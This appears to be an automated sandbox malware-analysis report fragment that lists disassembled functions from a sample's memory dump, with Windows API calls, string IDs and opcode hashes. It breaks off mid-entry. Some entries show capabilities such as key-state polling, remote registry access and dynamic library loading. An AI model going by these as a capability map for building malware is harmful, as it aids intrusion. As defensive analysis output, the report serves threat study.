                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                              • String ID: Line:
                              • API String ID: 3942752672-1585850449
                              • Opcode ID: 4356f77344820153b87935655d39a65bf43e30d27cb96400eeb2afa83b558562
                              • Instruction ID: ce68af2b9850af9c8c7c309ca72507e7d7d487adfc08885a0bb8ad44da7e3601
                              • Opcode Fuzzy Hash: 4356f77344820153b87935655d39a65bf43e30d27cb96400eeb2afa83b558562
                              • Instruction Fuzzy Hash: 9B3190B200C315AAE731FB68DC45FDB77E8FB56314F20461AB195D20A1EBB4A648C793
                              Function 00906656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009066D0
                              • LoadLibraryW.KERNEL32(?), ref: 009066D7
                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009066EC
                              • DestroyWindow.USER32(?), ref: 009066F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                              • String ID: SysAnimate32
                              • API String ID: 4146253029-1011021900
                              • Opcode ID: 33d93bf9a4ee45eea18c8cab8ab6de587f299811c8b605efa7b7d8722cf3e660
                              • Instruction ID: 1d43bff58b5fc22a1444e75788d0def404a43abdce5221c0bf1c0663cd66c059
                              • Opcode Fuzzy Hash: 33d93bf9a4ee45eea18c8cab8ab6de587f299811c8b605efa7b7d8722cf3e660
                              • Instruction Fuzzy Hash: 29219D7120020AAFEF104F68EC80EBB37ADEB59768F104629F911921E0D772CC61A760
                              Function 008E703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                              Download Yara Rule
                              APIs
                              • GetStdHandle.KERNEL32(0000000C), ref: 008E705E
                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E7091
                              • GetStdHandle.KERNEL32(0000000C), ref: 008E70A3
                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008E70DD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateHandle$FilePipe
                              • String ID: nul
                              • API String ID: 4209266947-2873401336
                              • Opcode ID: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
                              • Instruction ID: 0a19a64de08e5152bbc74bf931c841a5201c594ae6c2b8d807aa07d9e84374fb
                              • Opcode Fuzzy Hash: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
                              • Instruction Fuzzy Hash: 31218E7450864AABDB209F3ADC05A9A77A8FF56724F204A19FCA0D72D0E7B099509B50
                              Function 008E710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                              Download Yara Rule
                              APIs
                              • GetStdHandle.KERNEL32(000000F6), ref: 008E712B
                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E715D
                              • GetStdHandle.KERNEL32(000000F6), ref: 008E716E
                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008E71A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateHandle$FilePipe
                              • String ID: nul
                              • API String ID: 4209266947-2873401336
                              • Opcode ID: 9acc3c5f8c49e5f56fb63e811cfc64c597277fd1261acd863eab31b6d066db27
                              • Instruction ID: f591bdc3a56c1a99c8e1629faff4f4280848885110e2b28158b2e0719292eca7
                              • Opcode Fuzzy Hash: 9acc3c5f8c49e5f56fb63e811cfc64c597277fd1261acd863eab31b6d066db27
                              • Instruction Fuzzy Hash: CF21B375508389ABDB209F6A9C04A9AB7E8FF56734F200619FDB0D32D0E770D951CB51
                              Function 008EAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 008EAEBF
                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008EAF13
                              • __swprintf.LIBCMT ref: 008EAF2C
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0090F910), ref: 008EAF6A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume__swprintf
                              • String ID: %lu
                              • API String ID: 3164766367-685833217
                              • Opcode ID: 8ec9aee043d650bd2c21ec5dcbe8bcaf84b1126739dac50a52ce28f4c5b941e5
                              • Instruction ID: 796973e84abdc56c1af81819ab9705292bb51b3a92d7a68b86ca67bc7b5bfe1f
                              • Opcode Fuzzy Hash: 8ec9aee043d650bd2c21ec5dcbe8bcaf84b1126739dac50a52ce28f4c5b941e5
                              • Instruction Fuzzy Hash: EF218330A00109AFCB10EF69CC85DAE7BB8FF89714B004069F949EB251DB71EE41DB62
                              Function 008DA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                • Part of subcall function 008DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008DA399
                                • Part of subcall function 008DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA3AC
                                • Part of subcall function 008DA37C: GetCurrentThreadId.KERNEL32 ref: 008DA3B3
                                • Part of subcall function 008DA37C: AttachThreadInput.USER32(00000000), ref: 008DA3BA
                              • GetFocus.USER32 ref: 008DA554
                                • Part of subcall function 008DA3C5: GetParent.USER32(?), ref: 008DA3D3
                              • GetClassNameW.USER32(?,?,00000100), ref: 008DA59D
                              • EnumChildWindows.USER32(?,008DA615), ref: 008DA5C5
                              • __swprintf.LIBCMT ref: 008DA5DF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                              • String ID: %s%d
                              • API String ID: 1941087503-1110647743
                              • Opcode ID: a93f97d5d077b049614a73600b055f9c9b30f0ae4fc3fe18ac706a512aefe056
                              • Instruction ID: 1ee15f607347eed9e3b8dc29c71c75972f5708316398cabb5558fee169996f03
                              • Opcode Fuzzy Hash: a93f97d5d077b049614a73600b055f9c9b30f0ae4fc3fe18ac706a512aefe056
                              • Instruction Fuzzy Hash: 5A11B471204208BBDF247F68EC85FEA377DFF48704F144176B908EA252CA749A459B76
                              Function 008E2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              • CharUpperBuffW.USER32(?,?), ref: 008E2048
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: BuffCharUpper
                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                              • API String ID: 3964851224-769500911
                              • Opcode ID: dead8f1065921ffb5f02af03c7195c286e798943ecb9764f40d0e848955eb8ab
                              • Instruction ID: 80bc65c9564fda9704923516c55a6e15b72709917726d4a47495b65a72ddaad9
                              • Opcode Fuzzy Hash: dead8f1065921ffb5f02af03c7195c286e798943ecb9764f40d0e848955eb8ab
                              • Instruction Fuzzy Hash: F1115B759142098FCF10EFA8D9914EEB7F4FF5A304F108568D855E7292EB32A906CF51
                              Function 008FEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008FEF1B
                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008FEF4B
                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008FF07E
                              • CloseHandle.KERNEL32(?), ref: 008FF0FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                              • String ID:
                              • API String ID: 2364364464-0
                              • Opcode ID: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
                              • Instruction ID: 07ece44c84d1334fef289d17691e7bf6ff135245755e912084accfa81fac9db2
                              • Opcode Fuzzy Hash: ef1c39fd3af289943a41595cb8d8a452a3625d7a8da1351632afe3669598ee76
                              • Instruction Fuzzy Hash: DD8152716047119FD724EF28C886F2AB7E5FF88720F14881DF696DB292DB70AD418B52
                              Function 009002C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                • Part of subcall function 009010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00900038,?,?), ref: 009010BC
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00900388
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009003C7
                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0090040E
                              • RegCloseKey.ADVAPI32(?,?), ref: 0090043A
                              • RegCloseKey.ADVAPI32(00000000), ref: 00900447
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                              • String ID:
                              • API String ID: 3440857362-0
                              • Opcode ID: 04da734c09e6549798b13a1ead48150869a7edd963aadb464899f7cb7f1016c7
                              • Instruction ID: 6685edd824a130673ab16c5db8da7bf47b45fd988f3a9baa6f94fc16c2fce2e2
                              • Opcode Fuzzy Hash: 04da734c09e6549798b13a1ead48150869a7edd963aadb464899f7cb7f1016c7
                              • Instruction Fuzzy Hash: 92513831208204AFD714EF68C891F6EB7E8FF88714F44892EF595972A1EB31E905DB52
                              Function 008FDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008FDC3B
                              • GetProcAddress.KERNEL32(00000000,?), ref: 008FDCBE
                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 008FDCDA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 008FDD1B
                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 008FDD35
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008E7B20,?,?,00000000), ref: 00885B8C
                                • Part of subcall function 00885B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008E7B20,?,?,00000000,?,?), ref: 00885BB0
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                              • String ID:
                              • API String ID: 327935632-0
                              • Opcode ID: 471be3dd1ce2bae88ed03005816db53c76b9b4f122064db094944f1d4ef9443d
                              • Instruction ID: dec0f9dce08120233bceede0f0592ff20cb4f3052bdca275d0fba08748ca7ff6
                              • Opcode Fuzzy Hash: 471be3dd1ce2bae88ed03005816db53c76b9b4f122064db094944f1d4ef9443d
                              • Instruction Fuzzy Hash: D0510735A04209DFCB10EF68C8949ADB7F5FF59310B188069EA55EB312DB31ED45CB91
                              Function 008EE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                              Download Yara Rule
                              APIs
                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008EE88A
                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008EE8B3
                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 008EE8F2
                                • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 008EE917
                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 008EE91F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                              • String ID:
                              • API String ID: 1389676194-0
                              • Opcode ID: 479bde119cf5a07c938ce6948c44e1efb11167ab4ad085934642d72fbae74ace
                              • Instruction ID: a98398eb4513fb86ac8511e43c6a1d0e99dea6e49bb561991cb2e44be22aea8b
                              • Opcode Fuzzy Hash: 479bde119cf5a07c938ce6948c44e1efb11167ab4ad085934642d72fbae74ace
                              • Instruction Fuzzy Hash: 86510935A00215DFCB15EF69C9819AEBBF5FF09310B1880A9E849EB362CB31ED11DB51
                              Function 0090A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3da126257d906fdb26cd56461837ddaddbe1a45b4a9f716d36b41c8f7ffefb65
                              • Instruction ID: f60d54fefe89b32cf8997d636cb0aaf950443a75c21007c7e75cbb5c94d0893f
                              • Opcode Fuzzy Hash: 3da126257d906fdb26cd56461837ddaddbe1a45b4a9f716d36b41c8f7ffefb65
                              • Instruction Fuzzy Hash: 2441D139904304AFD720DF28CC58FA9BBACFB09320F154265F855A72E1D770AE81DAD2
                              Function 00882344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetCursorPos.USER32(?), ref: 00882357
                              • ScreenToClient.USER32(009467B0,?), ref: 00882374
                              • GetAsyncKeyState.USER32(00000001), ref: 00882399
                              • GetAsyncKeyState.USER32(00000002), ref: 008823A7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AsyncState$ClientCursorScreen
                              • String ID:
                              • API String ID: 4210589936-0
                              • Opcode ID: 2483bb89c81b9ec439a122cae71d2935c84a7eec7af1e15af0c641481b4c3cdd
                              • Instruction ID: 87dcc7880c9624c1cd4d7aae12439e96ec8ddfd174547df84e128421f564d77d
                              • Opcode Fuzzy Hash: 2483bb89c81b9ec439a122cae71d2935c84a7eec7af1e15af0c641481b4c3cdd
                              • Instruction Fuzzy Hash: 1C417F75504119FFDF19AF68C854AEDBB74FB45324F20435AF828E23A0C7346A94DB91
                              Function 008D6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                              Download Yara Rule
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D695D
                              • TranslateAcceleratorW.USER32(?,?,?), ref: 008D69A9
                              • TranslateMessage.USER32(?), ref: 008D69D2
                              • DispatchMessageW.USER32(?), ref: 008D69DC
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008D69EB
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                              • String ID:
                              • API String ID: 2108273632-0
                              • Opcode ID: 98fcded3d896ec28aa4784381cc11e5c26c91fbde17f7de38bf0ad55428b7f76
                              • Instruction ID: 905f78107de634287fa5c5eae3bab8bba848eeb4814ea5d38e4d80d03268e2ff
                              • Opcode Fuzzy Hash: 98fcded3d896ec28aa4784381cc11e5c26c91fbde17f7de38bf0ad55428b7f76
                              • Instruction Fuzzy Hash: 4E31E4B191421EBEDB20CF748C94FB67BA8FB03304F144366E461D22A1F77598A5E791
                              Function 008D8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                              Download Yara Rule
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 008D8F12
                              • PostMessageW.USER32(?,00000201,00000001), ref: 008D8FBC
                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008D8FC4
                              • PostMessageW.USER32(?,00000202,00000000), ref: 008D8FD2
                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008D8FDA
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessagePostSleep$RectWindow
                              • String ID:
                              • API String ID: 3382505437-0
                              • Opcode ID: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                              • Instruction ID: ecb873577da332d9bff5531a0b677e8e231a84c64801938d2bd23431b7610f97
                              • Opcode Fuzzy Hash: 5c38bdacc0e1e9082b7e952baa8a7b9966000972e2406617a3a0f7594defd8a3
                              • Instruction Fuzzy Hash: A431CE71504219EFDB14CF68DD4CAAE7BB6FB04315F10422AF925EA2D0CBB09A54DB91
                              Function 008DB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                              Download Yara Rule
                              APIs
                              • IsWindowVisible.USER32(?), ref: 008DB6C7
                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008DB6E4
                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008DB71C
                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008DB742
                              • _wcsstr.LIBCMT ref: 008DB74C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                              • String ID:
                              • API String ID: 3902887630-0
                              • Opcode ID: c0e85ebfe12c70219afc26efc82ec193e06ca8b3587dddb88984c7d5565e03b0
                              • Instruction ID: 9fe8474bc5a5f9912149489fafd98e8042c9d8703ee286a5da8833311dae1795
